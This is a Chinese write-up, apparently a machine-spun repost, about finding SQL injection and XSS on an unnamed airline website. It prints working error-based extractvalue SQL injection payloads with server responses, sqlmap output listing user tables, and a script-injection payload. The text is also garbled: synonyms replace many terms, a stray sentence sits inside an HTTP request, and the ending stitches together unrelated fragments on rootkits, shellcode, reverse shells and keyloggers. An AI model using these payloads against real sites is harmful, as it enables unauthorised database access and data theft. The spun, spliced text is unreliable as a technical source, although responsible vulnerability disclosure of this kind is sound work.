在上个月的日常挖洞过程中，我发现了一个当时十分抢手的航空公司网站，并在该网站中发现了几个安全缝隙。因为这个网站还没有建立揭露的缝隙奖赏方案，所以我们不方便在此泄漏该网站的实在身份，我们干脆以为它的域名为goodwebsite.com。接下来我会给我们介绍我怎么挖到了该网站中存在的SQL注入缝隙以及XSS（跨站脚本）缝隙。

SQL注入缝隙有什么作用?

 

---

简而言之，这种SQL注入缝隙将答应未经身份验证得用户从方针网站的数据库中获取数据，其间也包括许多灵敏的用户信息。

为什么会存在这种安全问题?

 

---

之所以这里会存在SQL注入缝隙，首要是因为goodwebsite.com的登录页面在处理用户的输入数据时，没有过滤掉其间或许存在的灵敏字符，相当于他们直接将用户的输入数据刺进到了一条或多条原始的SQL查询句子之中。通过运用这种侵犯向量，侵犯者可以从方针网站的数据库中获取到用户的暗码哈希以及其他的数据。

因而，我在检验该网站登录页面的时分，我随机输入了一堆用户名和暗码之后，用Burp Suite阻拦下了浏览器发送的恳求，然后把用户名改成了“Test%27”。批改完恳求之后，我将该恳求转发到了Burp Repeater，最终我得到了一个包括差错信息的照应。恳求和照应的差错信息如下所示：

 

1 2 3 4 5 6 7 8 9 10 11 12 13 Request:POST /register-login/check.php HTTP/1.1 Content-Length: 76 Content-Type: application/x-www-form-urlencoded Cookie: bmslogin=no; bmsid=f3011db015dca9a4f2377cd4e864f724 Host: goodwebsite.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* strLogin=Test%27&strPassword=k &nb重要的是你需求得到授权：无记名令牌。这是一个32个字符的字母数据字符串。sp; Response Error: <pre>PDOException Object ( [message:protected] => SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Test’ ‘ and `valid_id` = 1’ at line 1 [string:Exception:private] => [code:protected] => 42000 [file:protected] => /var/www/goodwebsite.server.com/register-login/send.php [line:protected] => 10 [trace:Exception:private] => Array ( 

[0] => Array ( [file] => /var/www/goodwebsite.server.com/register-login/send.php [line] => 10 [function] => query [class] => PDO [type] => -> [args] => Array ( [0] => SELECT * FROM `wp_ggg_user` WHERE `login` = Test’e ‘ and `valid_id` = 1; ) [previous:Exception:private] => [errorInfo] => Array ( [0] => 42000 [1] => 1064 [2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Test’ ‘ and `valid_id` = 1’ at line 1 ) </pre>

当我看到照应信息中的这些差错提示之后，我榜首反响就是应该检验一下其他的SQL查询句子，而我榜首次检验所运用的查询句子如下所示：

1 Test%27and extractvalue(1,concat(0x00a,database()))or’

这一次服务器回来的差错信息与之前十分类似，但是照应信息的结束部分却有一点点不相同...

 

1 2 3 4 5 6 7 8 [previous:Exception:private] =>  [errorInfo] => Array  (  [0] => HY000  [1] => 1105  [2] => XPATH syntax error: ‘ goodwebsite’  )

因而，差错信息相当于现已把goodwebsite网站的数据库称号回来给我了：

除此之外，我还检验了一些其他根本的查询参数。例如：

 

1 2 3 4 5 6 7 8 9 system_user() @@version database() @@hostname @@datadir @@GLOBAL.VERSION session_user() schema() UUID()

接下来，我所检验的查询句子如下所示：

1 Test%27and extractvalue(1,concat(0x00a,system_user()))or’

这一次回来的差错信息如下：

 

1 2 3 4 5 6 7 8 [previous:Exception:private] =>  [errorInfo] => Array  (  [0] => HY000  [1] => 1105  [2] => XPATH syntax error: ‘ goodwebsite@localhost’  )

从照应信息中来看，我们现已获取到了System_User：

这样一来，这个SQL注入缝隙就现已成功确认了，但是我还想愈加深化一下，看看能不能获取到更多有价值的信息，而我所运用的第三条检验句子如下所示：

1 Test%27and extractvalue(1,concat(0x00a,@@hostname))or’

而这一次我得到的差错信息如下：

 

1 2 3 4 5 6 7 8 [previous:Exception:private] =>     [errorInfo] => Array         (             [0] => HY000             [1] => 1105             [2] => XPATH syntax error: ' www2.rz.something.com'         )

这一次，我成功获取到了方针站点的主机名hostname：

等等，我居然忘掉查看数据库的版别了！所以我又运用了下面这条查询句子：

1 Test%27and extravtcalue(1,concat(0x00a,@@version))or’

照应中的差错信息输出如下所示：

 

1 2 3 4 5 6 7 8 [previous:Exception:private] => [errorInfo] => Array ( [0] => HY000 [1] => 1105 [2] => XPATH syntax error: ‘ 5.1.73–1+deb6u1-log’ )

接下来就是UUID了，这一步我所用的检验句子如下所示:

 

1 2 3 4 5 6 7 8 9 Test%27and extractvalue(1,concat(0x00a,UUID())or’ [previous:Exception:private] =>  [errorInfo] => Array  (  [0] => HY000  [1] => 1105  [2] => XPATH syntax error: ‘ ab88…..UUDI’  )

服务器端回来的信息如下所示，其间包括了UUID：

到现在为止，我现已搜集到了许多有价值的信息了，而且这些信息现已足以可以证明这个SQL注入的破坏力和影响力了。但是我想要的永久更多，而我又不想浪费时间，所以接下来我打开了终端并运行了sqlmap，下面是sqlmap的扫描效果：

 

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 web server operating system: Linux Debian 6.0 (squeeze) web application technology: Apache 2.2.16, PHP 5.4.42 back-end DBMS: MySQL >= 5.0 Database: goodwebsite[18 tables] + — — — — — — — — — — — — -+ | wp_bms_log | | wp_bms_quiz_lh_answer | | wp_bms_quiz_lh_question | | wp_bms_quiz_lh_quiz | | wp_bms_statistics | | wp_bms_user | | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | + — — — — — — — — — — — — -+Then:Table: wp_users [10 columns] + — — — — — — — — — — -+ — — — — — — — — — — -+ | Column | Type | + — — — — — — — — — — -+ — — — — — — — — — — -+ | display_name | varchar(250) | | ID | bigint(20) unsigned | | user_activation_key | varchar(255) | | user_email | varchar(100) | | user_login | varchar(60) | | user_nicename | varchar(50) | | user_pass | varchar(255) | | user_registered | datetime | | user_status | int(11) | | user_url | varchar(100) | + — — — — — — — — — — -+ — — — — — — — — — — -+

SQLmap的扫描效果截图：

XSS（跨站脚本缝隙）

 

---

接下来的使命就是要检验一下该网站的其他节点，看看是不是还存在其他的一些安全缝隙。不一会儿，我便发现了一个节点：

1 goodwebsite.com/register-login/send.php

这个节点承受POST恳求，而且还有一个参数“strSendMail=”

所以我依照之前的 *** 对这个节点进行了一次相同的SQL注入缝隙检验，检验效果（服务器端回来的差错信息）也与之前的相同。但是我在这里预备检验运用XSS Payload，看看能有什么作用。我运用的XSS Payload如下所示：

1 e’%22()%26%25<acx><ScRiPt%20>prompt(/khizer/)</ScRiPt>

恳求信息如下所示：

 

1 2 3 4 5 6 7 8 9 10 POST /register-login/send.php HTTP/1.1 Content-Length: 60 Content-Type: application/x-www-form-urlencoded Referer: http://goodwebsite.com/ Cookie: bmslogin=no; bmsid=f3011db015dca9a4f2377cd4e864f724 Host: goodwebsite.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */*strSendMail=e’%22()%26%25<acx><ScRiPt%20>prompt(/khizer/)</ScRiPt>

恳求发送之后，作用如下图所示：BOOM！！！

后话

 

---

我发现了这些缝隙之后，便马上将缝隙的详细信息上报给了这家公司，而这家公司的技术人员也在一个小时之内成功批改了这些缝隙，他们给我的回复信息如下：

我还专门问了他们是否可以在HackerOne上面独自开一个隐秘项目，但是他们表明现在还无法做到这个，但不管怎样，这一次的挖洞阅历仍是十分有意思的，因而我也期望将其共享给广阔社区的朋友们。

网站黑客技术:看我怎么发掘到了某抢手网站上的SQLi和XSS缝隙

Rootkit是一种特别的恶意软件，它的功用是在设备方针上躲藏自身及指定的文件、进程和 *** 链接等信息，比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合运用。cab.exe又呈

现了。 "mov byte ptr [ebp+0x26],0x57;"看我如何挖掘到了某热门网站上的SQLi和XSS漏洞

网站黑客技术为了实行LAME技术，我们还需要进行以下操作：然后，在gdb上下文中工作/bin/bash，在main()处设置断点，注入shellcode然后继续工作，如下所示：图2-4 files目录文件端口445的劫持与重定向

在本地输入设备（键盘）输入指令，在本地看不到输入的内容，但是键盘输入的指令现已被输出到了远程，然后指令的实行效果或许差错也会被传到远程，查看远程，可以看到标准输出和标准差错输出都重定向到了远程：1102 每一个职责的列表。只需当创立职责时才运用。只需在创立时就已知的字段(比方UID)才华够用在这个列表中。网站黑客技术

网页伺服器端作出以下照应：这是一个典型的以邮件作为传达前言，以非PE文件作为侵犯载荷的侵犯进程。本文将以该案例为切入点，针对现有的非PE侵犯 *** 进行分析与总结，内容包括脚本类型以及文档类型侵犯，下面初步今天的正文。 if (!strcmp("reset-device-info",msg->command))

在上图中我们得到了一个交互的shell。果然是这样！“0>&1”和“0工作，手动批改tagWnd的cbwndExtra字段，仿照一个write-what-where缝隙，得到如下效果： 看我如何挖掘到了某热门网站上的SQLi和XSS漏洞

网站黑客技术现在，Certbot现已为你的系统打包好了悉数的数据，你所要做的就是apt-get这些数据包。# Merge the rules into a new, merged code integrity policywindows下内存取证的内容归纳起来讲就是检测系统中有没有恶意程序,有没有躲藏进程,有没有躲藏文件,有没有躲藏服务,有没有躲藏的驱动,有没有躲藏 *** 端口等等.而进程,文件,驱动等等部件在内存中是以内核方针的 *** 独立存在的

。而一般形形 *** 的rootkit会检验批改操作系统的内部数据结构来抵达躲藏自身的目的.安全研究员要想在内存取证中做到笔底生花,就需要对windows各种内存方针相关概念进行深化的了解。-attempts //在停留之前需求进行几回检验（每个用户的检验次数）

2.3 导入burpsuite证书sudo apt-get install dn *** asq通过GOOGLE搜索技巧，毕竟我找到了开发该Keylogger软件的网站，在网站上，他们声称并排出了悉数“HawkEyekeylogger”具有的“牛X的功用”。　　 *** 总是有的，完美的Payload如下：网站黑客技术

(1)在http页面混有https内容时，页面排版不会发作乱排现象else

看我如何挖掘到了某热门网站上的SQLi和XSS漏洞
 }Arduino Leonardo是依据ATmega32u4一个微控制器板。它有20个数字输入/输出引脚（其间7个可用于PWM输出、12个可用于仿照输入），一个16 MHz的晶体振荡器，一个Micro USB接口，一个DC接口，一个ICSP接口，一个复位按钮。它包括了支撑微控制器所需的悉数，你可以简略地通过把它连接到计算机的USB接口，或许运用AC-DC适配器，再或许用电池来驱动它。Leonardo不同于之前悉数的arduino控制器，他直接运用了ATmega32u4的USB通讯功用，取消了USB转UART芯片。这使得Leonardo不只可以作为一个虚拟的（CDC）串行/ COM端口，还可以作为鼠标或许键盘连接到计算机。它还有许多不同的当地，我们会在入门页面中介绍。访问Nest恒温器的Go代码

本文标题:网站黑客技术:看我怎么发掘到了某抢手网站上的SQLi和XSS缝隙